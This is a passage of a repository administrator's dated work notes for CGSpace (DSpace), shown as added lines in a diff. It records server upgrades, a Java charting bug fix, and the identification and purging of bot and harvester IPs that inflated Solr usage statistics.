+<li>The solution is to do as we have done and increase the headers / boolean clauses, or to simply <a href="https://wiki.lyrasis.org/display/DSPACE/TechnicalFaq#TechnicalFAQ-I'mgetting%22SolrException:BadRequest%22followedbyalongqueryora%22tooManyClauses%22Exception">disable access rights awareness</a> in Discovery</li>
+<li>I applied the fix to the <code>5_x-prod</code> branch and cherry-picked it to <code>6_x-dev</code></li>
+</ul>
+</li>
+<li>Upgrade Tomcat from 7.0.99 to 7.0.100 in <a href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure playbooks</a></li>
+<li>Upgrade PostgreSQL JDBC driver from 42.2.9 to 42.2.10 in <a href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure playbooks</a></li>
+<li>Run Tomcat and PostgreSQL JDBC driver updates on DSpace Test (linode19)</li>
+</ul>
+<h2 id="2020-02-23">2020-02-23</h2>
+<ul>
+<li>I see a new spider in the nginx logs on CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>Mozilla/5.0 (compatible;Linespider/1.1;+https://lin.ee/4dwXkTH)
+</code></pre><ul>
+<li>I think this should be covered by the <a href="https://github.com/atmire/COUNTER-Robots">COUNTER-Robots</a> patterns for the statistics at least&hellip;</li>
+<li>I see some IP (186.32.217.255) in Costa Rica making requests like a bot with the following user agent:</li>
+</ul>
+<pre tabindex="0"><code>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36
+</code></pre><ul>
+<li>Another IP address (31.6.77.23) in the UK making a few hundred requests without a user agent</li>
+<li>I will add the IP addresses to the nginx badbots list</li>
+<li>31.6.77.23 is in the UK and judging by its DNS it belongs to a <a href="https://www.bronco.co.uk/">web marketing company called Bronco</a>
+<ul>
+<li>I looked for its DNS entry in Solr statistics and found a few hundred thousand over the years:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics/select&#34; -d &#34;q=dns:/squeeze3.bronco.co.uk./&amp;rows=0&#34;
+&lt;?xml version=&#34;1.0&#34; encoding=&#34;UTF-8&#34;?&gt;
+&lt;response&gt;
+&lt;lst name=&#34;responseHeader&#34;&gt;&lt;int name=&#34;status&#34;&gt;0&lt;/int&gt;&lt;int name=&#34;QTime&#34;&gt;4&lt;/int&gt;&lt;lst name=&#34;params&#34;&gt;&lt;str name=&#34;q&#34;&gt;dns:/squeeze3.bronco.co.uk./&lt;/str&gt;&lt;str name=&#34;rows&#34;&gt;0&lt;/str&gt;&lt;/lst&gt;&lt;/lst&gt;&lt;result name=&#34;response&#34; numFound=&#34;86044&#34; start=&#34;0&#34;&gt;&lt;/result&gt;
+&lt;/response&gt;
+</code></pre><ul>
+<li>The totals in each core are:
+<ul>
+<li>statistics: 86044</li>
+<li>statistics-2018: 65144</li>
+<li>statistics-2017: 79405</li>
+<li>statistics-2016: 121316</li>
+<li>statistics-2015: 30720</li>
+<li>statistics-2014: 4524</li>
+<li>&hellip; so about 387,000 hits!</li>
+</ul>
+</li>
+<li>I will purge them from each core one by one, ie:</li>
+</ul>
+<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics-2015/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#34;&lt;delete&gt;&lt;query&gt;dns:squeeze3.bronco.co.uk.&lt;/query&gt;&lt;/delete&gt;&#34;
+$ curl -s &#34;http://localhost:8081/solr/statistics-2014/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#34;&lt;delete&gt;&lt;query&gt;dns:squeeze3.bronco.co.uk.&lt;/query&gt;&lt;/delete&gt;&#34;
+</code></pre><ul>
+<li>Deploy latest Tomcat and PostgreSQL JDBC driver changes on CGSpace (linode18)</li>
+<li>Deploy latest <code>5_x-prod</code> branch on CGSpace (linode18)</li>
+<li>Run all system updates on CGSpace (linode18) server and reboot it
+<ul>
+<li>After the server came back up Tomcat started, but there were errors loading some Solr statistics cores</li>
+<li>Luckily after restarting Tomcat once more they all came back up</li>
+</ul>
+</li>
+<li>I ran the <code>dspace cleanup -v</code> process on CGSpace and got an error:</li>
+</ul>
+<pre tabindex="0"><code>Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
+  Detail: Key (bitstream_id)=(183996) is still referenced from table &#34;bundle&#34;.
+</code></pre><ul>
+<li>The solution is, as always:</li>
+</ul>
+<pre tabindex="0"><code># su - postgres
+$ psql dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (183996);&#39;
+UPDATE 1
+</code></pre><ul>
+<li>Аdd one more new Bioversity ORCID iD to the controlled vocabulary on CGSpace</li>
+<li>Felix Shaw from Earlham emailed me to ask about his admin account on DSpace Test
+<ul>
+<li>His old one got lost when I re-sync&rsquo;d DSpace Test with CGSpace a few weeks ago</li>
+<li>I added a new account for him and added it to the Administrators group:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ dspace user -a -m wow@me.com -g Felix -s Shaw -p &#39;fuananaaa&#39;
+</code></pre><ul>
+<li>For some reason the Atmire Content and Usage Analysis (CUA) module&rsquo;s Usage Statistics is drawing blank graphs
+<ul>
+<li>I looked in the dspace.log and see:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>2020-02-23 11:28:13,696 ERROR org.dspace.app.xmlui.cocoon.DSpaceCocoonServletFilter @ Serious Error Occurred Processing Request!
+org.springframework.web.util.NestedServletException: Handler processing failed; nested exception is java.lang.NoClassDefFoundError: Could not
+ initialize class org.jfree.chart.JFreeChart
+</code></pre><ul>
+<li>The same error happens on DSpace Test, but graphs are working on my local instance
+<ul>
+<li>The only thing I&rsquo;ve changed recently is the Tomcat version, but it&rsquo;s working locally&hellip;</li>
+<li>I see the following file on my local instance, CGSpace, and DSpace Test: <code>dspace/webapps/xmlui/WEB-INF/lib/jfreechart-1.0.5.jar</code></li>
+<li>I deployed Tomcat 7.0.99 on DSpace Test but the JFreeChart classs still can&rsquo;t be found&hellip;</li>
+<li>So it must be somthing with the library search path&hellip;</li>
+<li>Strange it works with Tomcat 7.0.100 on my local machine</li>
+</ul>
+</li>
+<li>I copied the <code>jfreechart-1.0.5.jar</code> file to the Tomcat lib folder and then there was a different error when I loaded Atmire CUA:</li>
+</ul>
+<pre tabindex="0"><code>2020-02-23 16:25:10,841 ERROR org.dspace.app.xmlui.cocoon.DSpaceCocoonServletFilter @ Serious Error Occurred Processing Request!  org.springframework.web.util.NestedServletException: Handler processing failed; nested exception is java.awt.AWTError: Assistive Technology not found: org.GNOME.Accessibility.AtkWrapper
+</code></pre><ul>
+<li>Some search results suggested commenting out the following line in <code>/etc/java-8-openjdk/accessibility.properties</code>:</li>
+</ul>
+<pre tabindex="0"><code>assistive_technologies=org.GNOME.Accessibility.AtkWrapper
+</code></pre><ul>
+<li>And removing the extra jfreechart library and restarting Tomcat I was able to load the usage statistics graph on DSpace Test&hellip;
+<ul>
+<li>Hmm, actually I think this is an Java bug, perhaps introduced or at <a href="https://bugs.openjdk.java.net/browse/JDK-8204862">least present in 18.04</a>, with lots of <a href="https://code-maven.com/slides/jenkins-intro/no-graph-error">references</a> to it <a href="https://issues.jenkins-ci.org/browse/JENKINS-39636">happening in other</a> configurations like Debian 9 with Jenkins, etc&hellip;</li>
+<li>Apparently if you use the <em>non-headless</em> version of openjdk this doesn&rsquo;t happen&hellip; but that pulls in X11 stuff so no thanks</li>
+<li>Also, I see dozens of occurences of this going back over one month (we have logs for about that period):</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code># grep -c &#39;initialize class org.jfree.chart.JFreeChart&#39; dspace.log.2020-0*
+dspace.log.2020-01-12:4
+dspace.log.2020-01-13:66
+dspace.log.2020-01-14:4
+dspace.log.2020-01-15:36
+dspace.log.2020-01-16:88
+dspace.log.2020-01-17:4
+dspace.log.2020-01-18:4
+dspace.log.2020-01-19:4
+dspace.log.2020-01-20:4
+dspace.log.2020-01-21:4
+...
+</code></pre><ul>
+<li>I deployed the fix on CGSpace (linode18) and I was able to see the graphs in the Atmire CUA Usage Statistics&hellip;</li>
+<li>On an unrelated note there is something weird going on in that I see millions of hits from IP 34.218.226.147 in Solr statistics, but if I remember correctly that IP belongs to CodeObia&rsquo;s AReS explorer, but it should only be using REST and therefore no Solr statistics&hellip;?</li>
+</ul>
+<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics-2018/select&#34; -d &#34;q=ip:34.218.226.147&amp;rows=0&#34;
+&lt;?xml version=&#34;1.0&#34; encoding=&#34;UTF-8&#34;?&gt;
+&lt;response&gt;
+&lt;lst name=&#34;responseHeader&#34;&gt;&lt;int name=&#34;status&#34;&gt;0&lt;/int&gt;&lt;int name=&#34;QTime&#34;&gt;811&lt;/int&gt;&lt;lst name=&#34;params&#34;&gt;&lt;str name=&#34;q&#34;&gt;ip:34.218.226.147&lt;/str&gt;&lt;str name=&#34;rows&#34;&gt;0&lt;/str&gt;&lt;/lst&gt;&lt;/lst&gt;&lt;result name=&#34;response&#34; numFound=&#34;5536097&#34; start=&#34;0&#34;&gt;&lt;/result&gt;
+&lt;/response&gt;
+</code></pre><ul>
+<li>And there are apparently two million from last month (2020-01):</li>
+</ul>
+<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics/select&#34; -d &#34;q=ip:34.218.226.147&amp;fq=dateYearMonth:2020-01&amp;rows=0&#34;
+&lt;?xml version=&#34;1.0&#34; encoding=&#34;UTF-8&#34;?&gt;
+&lt;response&gt;
+&lt;lst name=&#34;responseHeader&#34;&gt;&lt;int name=&#34;status&#34;&gt;0&lt;/int&gt;&lt;int name=&#34;QTime&#34;&gt;248&lt;/int&gt;&lt;lst name=&#34;params&#34;&gt;&lt;str name=&#34;q&#34;&gt;ip:34.218.226.147&lt;/str&gt;&lt;str name=&#34;fq&#34;&gt;dateYearMonth:2020-01&lt;/str&gt;&lt;str name=&#34;rows&#34;&gt;0&lt;/str&gt;&lt;/lst&gt;&lt;/lst&gt;&lt;result name=&#34;response&#34; numFound=&#34;2173455&#34; start=&#34;0&#34;&gt;&lt;/result&gt;
+&lt;/response&gt;
+</code></pre><ul>
+<li>But when I look at the nginx access logs for the past month or so I only see 84,000, all of which are on <code>/rest</code> and none of which are to XMLUI:</li>
+</ul>
+<pre tabindex="0"><code># zcat /var/log/nginx/*.log.*.gz | grep -c 34.218.226.147
+84322
+# zcat /var/log/nginx/*.log.*.gz | grep 34.218.226.147 | grep -c &#39;/rest&#39;
+84322
+</code></pre><ul>
+<li>Either the requests didn&rsquo;t get logged, or there is some mixup with the Solr documents (fuck!)
+<ul>
+<li>On second inspection, I <em>do</em> see lots of notes here about 34.218.226.147, including 150,000 on one day in October, 2018 alone&hellip;</li>
+</ul>
+</li>
+<li>To make matters worse, I see hits from REST in the regular nginx access log!
+<ul>
+<li>I did a few tests and I can&rsquo;t figure out, but it seems that hits appear in either (not both)</li>
+<li>Also, I see <em>zero</em> hits to <code>/rest</code> in the access.log on DSpace Test (linode19)</li>
+</ul>
+</li>
+<li>Anyways, I faceted by IP in 2020-01 and see:</li>
+</ul>
+<pre tabindex="0"><code>$ curl -s &#39;http://localhost:8081/solr/statistics/select?q=*:*&amp;fq=dateYearMonth:2020-01&amp;rows=0&amp;wt=json&amp;indent=true&amp;facet=true&amp;facet.field=ip&#39;
+...
+        &#34;172.104.229.92&#34;,2686876,
+        &#34;34.218.226.147&#34;,2173455,
+        &#34;163.172.70.248&#34;,80945,
+        &#34;163.172.71.24&#34;,55211,
+        &#34;163.172.68.99&#34;,38427,
+</code></pre><ul>
+<li>Surprise surprise, the top two IPs are from AReS servers&hellip; wtf.</li>
+<li>The next three are from Online in France and they are all using this weird user agent and making tens of thousands of requests to Discovery:</li>
+</ul>
+<pre tabindex="0"><code>Mozilla/5.0 ((Windows; U; Windows NT 6.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6)
+</code></pre><ul>
+<li>And all the same three are already inflating the statistics for 2020-02&hellip; hmmm.</li>
+<li>I need to see why AReS harvesting is inflating the stats, as it should only be making REST requests&hellip;</li>
+<li>Shiiiiit, I see 84,000 requests from the AReS IP today alone:</li>
+</ul>
+<pre tabindex="0"><code>$ curl -s &#39;http://localhost:8081/solr/statistics/select?q=time:2020-02-22*+AND+ip:172.104.229.92&amp;rows=0&amp;wt=json&amp;indent=true&#39;
+...
+  &#34;response&#34;:{&#34;numFound&#34;:84594,&#34;start&#34;:0,&#34;docs&#34;:[]
+</code></pre><ul>
+<li>Fuck! And of course the ILRI websites doing their daily REST harvesting are causing issues too, from today alone:</li>
+</ul>
+<pre tabindex="0"><code>        &#34;2a01:7e00::f03c:91ff:fe9a:3a37&#34;,35512,
+        &#34;2a01:7e00::f03c:91ff:fe18:7396&#34;,26155,
+</code></pre><ul>
+<li>I need to try to make some requests for these URLs and observe if they make a statistics hit:
+<ul>
+<li><code>/rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=50&amp;offset=82450</code></li>
+<li><code>/rest/handle/10568/28702?expand=all</code></li>
+</ul>
+</li>
+<li>Those are the requests AReS and ILRI servers are making&hellip; nearly 150,000 per day!</li>
+<li>Well that settles it!</li>
+</ul>
+<pre tabindex="0"><code>$ curl -s &#39;http://localhost:8081/solr/statistics/select?q=time:2020-02-23*+AND+statistics_type:view&amp;fq=ip:78.128.99.24&amp;rows=10&amp;wt=json&amp;indent=true&#39; | grep numFound
+  &#34;response&#34;:{&#34;numFound&#34;:12,&#34;start&#34;:0,&#34;docs&#34;:[
+$ curl -s &#39;https://dspacetest.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=50&amp;offset=82450&#39;
+$ curl -s &#39;http://localhost:8081/solr/statistics/update?softCommit=true&#39;
+$ curl -s &#39;http://localhost:8081/solr/statistics/select?q=time:2020-02-23*+AND+statistics_type:view&amp;fq=ip:78.128.99.24&amp;rows=10&amp;wt=json&amp;indent=true&#39; | grep numFound
+  &#34;response&#34;:{&#34;numFound&#34;:62,&#34;start&#34;:0,&#34;docs&#34;:[
+</code></pre><ul>
+<li>A REST request with <code>limit=50</code> will make exactly fifty <code>statistics_type=view</code> statistics in the Solr core&hellip; fuck.
+<ul>
+<li>So not only do I need to purge all these millions of hits, we need to add these IPs to the list of spider IPs so they don&rsquo;t get recorded</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-02-24">2020-02-24</h2>
+<ul>
+<li>I tried to add some IPs to the DSpace spider list so they would not get recorded in Solr statistics, but it doesn&rsquo;t support IPv6
+<ul>
+<li>A better method is actually to just use the nginx mapping logic we already have to reset the user agent for these requests to &ldquo;bot&rdquo;</li>
+<li>That, or to really insist that users harvesting us specify some kind of user agent</li>
+</ul>
+</li>
+<li>I tried to add the IPs to our nginx IP bot mapping but it doesn&rsquo;t seem to work&hellip; WTF, why is everything broken?!</li>
+<li>Oh lord have mercy, the two AReS harvester IPs alone are responsible for 42 MILLION hits in 2019 and 2020 so far by themselves:</li>
+</ul>
+<pre tabindex="0"><code>$ http &#39;http://localhost:8081/solr/statistics/select?q=ip:34.218.226.147+OR+ip:172.104.229.92&amp;rows=0&amp;wt=json&amp;indent=true&#39; | grep numFound
+  &#34;response&#34;:{&#34;numFound&#34;:42395486,&#34;start&#34;:0,&#34;docs&#34;:[]
+</code></pre><ul>
+<li>I modified my <code>check-spider-hits.sh</code> script to create a version that works with IPs and purged 47 million stats from Solr on CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>$ ./check-spider-ip-hits.sh -u http://localhost:8081/solr -f 2020-02-24-bot-ips.txt -s statistics -p
+Purging 22809216 hits from 34.218.226.147 in statistics
+Purging 19586270 hits from 172.104.229.92 in statistics
+Purging 111137 hits from 2a01:7e00::f03c:91ff:fe9a:3a37 in statistics
+Purging 271668 hits from 2a01:7e00::f03c:91ff:fe18:7396 in statistics
+
+Total number of bot hits purged: 42778291
+$ ./check-spider-ip-hits.sh -u http://localhost:8081/solr -f 2020-02-24-bot-ips.txt -s statistics-2018 -p
+Purging 5535399 hits from 34.218.226.147 in statistics-2018
+
+Total number of bot hits purged: 5535399
+</code></pre><ul>
+<li>(The <code>statistics</code> core holds 2019 and 2020 stats, because the yearly sharding process failed this year)</li>
+<li>Attached is a before and after of the period from 2019-01 to 2020-02:</li>
+</ul>
+<p><img src="/cgspace-notes/2020/02/cgspace-stats-before.png" alt="CGSpace stats for 2019 and 2020 before the purge"></p>
+<p><img src="/cgspace-notes/2020/02/cgspace-stats-after.png" alt="CGSpace stats for 2019 and 2020 after the purge"></p>
+<ul>
+<li>And here is a graph of the stats by year since 2011:</li>
+</ul>
+<p><img src="/cgspace-notes/2020/02/cgspace-stats-years.png" alt="CGSpace stats by year since 2011 after the purge"></p>
+<ul>
+<li>I&rsquo;m a little suspicious of the 2012, 2013, and 2014 numbers, though
+<ul>
+<li>I should facet those years by IP and see if any stand out&hellip;</li>
+</ul>
+</li>
+<li>The next thing I need to do is figure out why the nginx IP to bot mapping isn&rsquo;t working&hellip;
+<ul>
+<li>Actually, and I&rsquo;ve probably learned this before, but the bot mapping is working, but nginx only logs the real user agent (of course!), as I&rsquo;m only using the mapped one in the proxy pass&hellip;</li>
+<li>This trick for adding a header with the mapped &ldquo;ua&rdquo; variable is nice:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>add_header X-debug-message &#34;ua is $ua&#34; always;
+</code></pre><ul>
+<li>Then in the HTTP response you see:</li>
+</ul>
+<pre tabindex="0"><code>X-debug-message: ua is bot
+</code></pre><ul>
+<li>So the IP to bot mapping is working, phew.</li>
+<li>More bad news, I checked the remaining IPs in our existing bot IP mapping, and there are statistics registered for them!
+<ul>
+<li>For example, ciat.cgiar.org was previously 104.196.152.243, but it is now 35.237.175.180, which I had noticed as a &ldquo;mystery&rdquo; client on Google Cloud in 2018-09</li>
+<li>Others I should probably add to the nginx bot map list are:
+<ul>
+<li>wle.cgiar.org (70.32.90.172)</li>
+<li>ccafs.cgiar.org (205.186.128.185)</li>
+<li>another CIAT scraper using the PHP GuzzleHttp library (45.5.184.72)</li>
+<li>macaronilab.com (<a href="https://viewdns.info/reverseip/?host=63.32.242.35&amp;t=1">63.32.242.35</a>)</li>
+<li>africa-rising.net (<a href="https://viewdns.info/reverseip/?host=162.243.171.159&amp;t=1">162.243.171.159</a></li>
+</ul>
+</li>
+</ul>
+</li>
+<li>These IPs are all active in the REST API logs over the last few months and they account for <em>thirty-four million</em> more hits in the statistics!</li>
+<li>I purged them from CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>$ ./check-spider-ip-hits.sh -u http://localhost:8081/solr -f /tmp/ips.txt -s statistics -p
+Purging 15 hits from 104.196.152.243 in statistics
+Purging 61064 hits from 35.237.175.180 in statistics
+Purging 1378 hits from 70.32.90.172 in statistics
+Purging 28880 hits from 205.186.128.185 in statistics
+Purging 464613 hits from 63.32.242.35 in statistics
+Purging 131 hits from 162.243.171.159 in statistics
+
+Total number of bot hits purged: 556081
+$ ./check-spider-ip-hits.sh -u http://localhost:8081/solr -f /tmp/ips.txt -s statistics-2018 -p
+Purging 684888 hits from 104.196.152.243 in statistics-2018
+Purging 323737 hits from 35.227.26.162 in statistics-2018
+Purging 221091 hits from 35.237.175.180 in statistics-2018
+Purging 3834 hits from 205.186.128.185 in statistics-2018
+Purging 20337 hits from 63.32.242.35 in statistics-2018
+
+Total number of bot hits purged: 1253887
+$ ./check-spider-ip-hits.sh -u http://localhost:8081/solr -f /tmp/ips.txt -s statistics-2017 -p
+Purging 1752548 hits from 104.196.152.243 in statistics-2017
+
+Total number of bot hits purged: 1752548
+</code></pre><ul>
+<li>I looked in the REST API logs for the past month and found a few more IPs:
+<ul>
+<li>95.110.154.135 (BioversityBot)</li>
+<li>34.209.213.122 (IITA? bot)</li>
+</ul>
+</li>
+<li>The client at 3.225.28.105 is using the following user agent:</li>
+</ul>
+<pre tabindex="0"><code>Apache-HttpClient/4.3.4 (java 1.5)
+</code></pre><ul>
+<li>But I don&rsquo;t see any hits for it in the statistics core for some reason</li>
+<li>Looking more into the 2015 statistics I see some questionable IPs:
+<ul>
+<li>50.115.121.196 has a DNS of saltlakecity2tr.monitis.com</li>
+<li>70.32.99.142 has userAgent Drupal</li>
+<li>104.130.164.111 was some scraper on Rackspace.com that made ~30,000 requests per month</li>
+<li>45.56.65.158 was some scraper on Linode that made ~30,000 requests per month</li>
+<li>23.97.198.40 was some scraper with an IP owned by Microsoft that made ~4,000 requests per month and had no user agent</li>
+<li>180.76.15.6 and <em>dozens</em> of other IPs with DNS like baiduspider-180-76-15-6.crawl.baidu.com. (and they were using a Mozilla/5.0 user agent!)</li>
+</ul>
+</li>
+<li>For the IPs I purged them using <code>check-spider-ip-hits.sh</code>:</li>
+</ul>
+<pre tabindex="0"><code>$ ./check-spider-ip-hits.sh -u http://localhost:8081/solr -f /tmp/ips.txt -s statistics -p
+Purging 11478 hits from 95.110.154.135 in statistics
+Purging 1208 hits from 34.209.213.122 in statistics
+Purging 10 hits from 54.184.39.242 in statistics
+
+Total number of bot hits purged: 12696
+$ ./check-spider-ip-hits.sh -u http://localhost:8081/solr -f /tmp/ips.txt -s statistics-2018 -p
+Purging 12572 hits from 95.110.154.135 in statistics-2018
+Purging 233 hits from 34.209.213.122 in statistics-2018
+
+Total number of bot hits purged: 12805
+$ ./check-spider-ip-hits.sh -u http://localhost:8081/solr -f /tmp/ips.txt -s statistics-2017 -p
+Purging 37503 hits from 95.110.154.135 in statistics-2017
+Purging 25 hits from 34.209.213.122 in statistics-2017
+Purging 8621 hits from 23.97.198.40 in statistics-2017
+
+Total number of bot hits purged: 46149
+$ ./check-spider-ip-hits.sh -u http://localhost:8081/solr -f /tmp/ips.txt -s statistics-2016 -p
+Purging 1476 hits from 95.110.154.135 in statistics-2016
+Purging 10490 hits from 70.32.99.142 in statistics-2016
+Purging 29519 hits from 50.115.121.196 in statistics-2016
+Purging 175758 hits from 45.56.65.158 in statistics-2016
+Purging 26279 hits from 23.97.198.40 in statistics-2016
+
+Total number of bot hits purged: 243522
+$ ./check-spider-ip-hits.sh -u http://localhost:8081/solr -f /tmp/ips.txt -s statistics-2015 -p
+Purging 49351 hits from 70.32.99.142 in statistics-2015
+Purging 30278 hits from 50.115.121.196 in statistics-2015
+Purging 172292 hits from 104.130.164.111 in statistics-2015
+Purging 78571 hits from 45.56.65.158 in statistics-2015
+Purging 16069 hits from 23.97.198.40 in statistics-2015
+
+Total number of bot hits purged: 346561
+$ ./check-spider-ip-hits.sh -u http://localhost:8081/solr -f /tmp/ips.txt -s statistics-2014 -p 
+Purging 462 hits from 70.32.99.142 in statistics-2014
+Purging 1766 hits from 50.115.121.196 in statistics-2014
+
+Total number of bot hits purged: 2228
+</code></pre><ul>
+<li>Then I purged about 200,000 Baidu hits from the 2015 to 2019 statistics cores with a few manual delete queries because they didn&rsquo;t have a proper user agent and the only way to identify them was via DNS:</li>
+</ul>
+<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics-2016/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#34;&lt;delete&gt;&lt;query&gt;dns:*crawl.baidu.com.&lt;/query&gt;&lt;/delete&gt;&#34;
+</code></pre><ul>
+<li>Jesus, the more I keep looking, the more I see ridiculous stuff&hellip;</li>
+<li>In 2019 there were a few hundred thousand requests from CodeObia on Orange Jordan network&hellip;
+<ul>
+<li>79.173.222.114</li>
+<li>149.200.141.57</li>
+<li>86.108.89.91</li>
+<li>And others&hellip;</li>
+</ul>
+</li>
+<li>Also I see a CIAT IP 45.5.186.2 that was making hundreds of thousands of requests (and 100/sec at one point in 2019)</li>
+<li>Also I see some IP on Hetzner making 10,000 requests per month: 2a01:4f8:210:51ef::2</li>
+<li>Also I see some IP in Greece making 130,000 requests with weird user agents: 143.233.242.130</li>
+<li>I purged a bunch more from all cores:</li>
+</ul>
+<pre tabindex="0"><code>$ ./check-spider-ip-hits.sh -u http://localhost:8081/solr -f /tmp/ips.txt -s statistics -p     
+Purging 109965 hits from 45.5.186.2 in statistics
+Purging 78648 hits from 79.173.222.114 in statistics
+Purging 49032 hits from 149.200.141.57 in statistics
+Purging 26897 hits from 86.108.89.91 in statistics
+Purging 80898 hits from 2a01:4f8:210:51ef::2 in statistics
+Purging 130831 hits from 143.233.242.130 in statistics
+Purging 46489 hits from 83.103.94.48 in statistics
+
+Total number of bot hits purged: 522760
+$ ./check-spider-ip-hits.sh -u http://localhost:8081/solr -f /tmp/ips.txt -s statistics-2018 -p
+Purging 41574 hits from 45.5.186.2 in statistics-2018
+Purging 39620 hits from 2a01:4f8:210:51ef::2 in statistics-2018
+Purging 19325 hits from 83.103.94.48 in statistics-2018
+
+Total number of bot hits purged: 100519
+$ ./check-spider-ip-hits.sh -u http://localhost:8081/solr -f /tmp/ips.txt -s statistics-2017   
+Found 296 hits from 45.5.186.2 in statistics-2017
+Found 390 hits from 2a01:4f8:210:51ef::2 in statistics-2017
+Found 16086 hits from 83.103.94.48 in statistics-2017
+
+Total number of hits from bots: 16772
+$ ./check-spider-ip-hits.sh -u http://localhost:8081/solr -f /tmp/ips.txt -s statistics-2017 -p
+Purging 296 hits from 45.5.186.2 in statistics-2017
+Purging 390 hits from 2a01:4f8:210:51ef::2 in statistics-2017
+Purging 16086 hits from 83.103.94.48 in statistics-2017
+
+Total number of bot hits purged: 16772
+$ ./check-spider-ip-hits.sh -u http://localhost:8081/solr -f /tmp/ips.txt -s statistics-2016 -p
+Purging 394 hits from 2a01:4f8:210:51ef::2 in statistics-2016
+Purging 26519 hits from 83.103.94.48 in statistics-2016
+
+Total number of bot hits purged: 26913
+$ ./check-spider-ip-hits.sh -u http://localhost:8081/solr -f /tmp/ips.txt -s statistics-2015 -p
+Purging 1 hits from 143.233.242.130 in statistics-2015
+Purging 14109 hits from 83.103.94.48 in statistics-2015
+
+Total number of bot hits purged: 14110
+</code></pre><ul>
+<li>Though looking in my REST logs for the last month I am second guessing my judgement on 45.5.186.2 because I see user agents like &ldquo;Microsoft Office Word 2014&rdquo;</li>
+<li>Actually no, the overwhelming majority of these are coming from something harvesting the REST API with no user agent:</li>
+</ul>
+<pre tabindex="0"><code># zgrep 45.5.186.2 /var/log/nginx/rest.log.[1234]* | awk -F\&#34; &#39;{print $6}&#39; | sort | uniq -c | sort -h
+      1 Microsoft Office Word 2014
+      1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office)
+      1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
+      1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
+      2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36
+      3 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
+     24 GuzzleHttp/6.3.3 curl/7.59.0 PHP/7.0.31
+     34 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36
+     98 Apache-HttpClient/4.3.4 (java 1.5)
+  54850 -
+</code></pre><ul>
+<li>I see lots of requests coming from the following user agents:</li>
+</ul>
+<pre tabindex="0"><code>&#34;Apache-HttpClient/4.5.7 (Java/11.0.3)&#34;
+&#34;Apache-HttpClient/4.5.7 (Java/11.0.2)&#34;
+&#34;LinkedInBot/1.0 (compatible; Mozilla/5.0; Jakarta Commons-HttpClient/4.3 +http://www.linkedin.com)&#34;
+&#34;EventMachine HttpClient&#34;
+</code></pre><ul>
+<li>I should definitely add HttpClient to the bot user agents&hellip;</li>
+<li>Also, while <code>bot</code>, <code>spider</code>, and <code>crawl</code> are in the pattern list already and can be used for case-insensitive matching when used by DSpace in Java, I can&rsquo;t do case-insensitive matching in Solr with <code>check-spider-hits.sh</code>
+<ul>
+<li>I need to add <code>Bot</code>, <code>Spider</code>, and <code>Crawl</code> to my local user agent file to purge them</li>
+<li>Also, I see lots of hits from &ldquo;Indy Library&rdquo;, which we&rsquo;ve been blocking for a long time, but somehow these got through (I think it&rsquo;s the Greek guys using Delphi)</li>
+<li>Somehow my regex conversion isn&rsquo;t working in check-spider-hits.sh, but &ldquo;<em>Indy</em>&rdquo; will work for now</li>
+<li>Purging just these case-sensitive patterns removed ~1 million more hits from 2011 to 2020</li>
+</ul>
+</li>
+<li>More weird user agents in 2019:</li>
+</ul>
+<pre tabindex="0"><code>ecolink (+https://search.ecointernet.org/)
+ecoweb (+https://search.ecointernet.org/)
+EcoInternet http://www.ecointernet.org/
+EcoInternet http://ecointernet.org/
+</code></pre><h2 id="2020-02-25">2020-02-25</h2>
+<ul>
+<li>And what&rsquo;s the 950,000 hits from Online.net IPs with the following user agent:</li>
+</ul>
+<pre tabindex="0"><code>Mozilla/5.0 ((Windows; U; Windows NT 6.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6)
+</code></pre><ul>
+<li>Over half of the requests were to Discover and Browse pages, and the rest were to actual item pages, but they were within seconds of each other, so I&rsquo;m purging them all</li>
+<li>I looked deeper in the Solr statistics and found a bunch more weird user agents:</li>
+</ul>
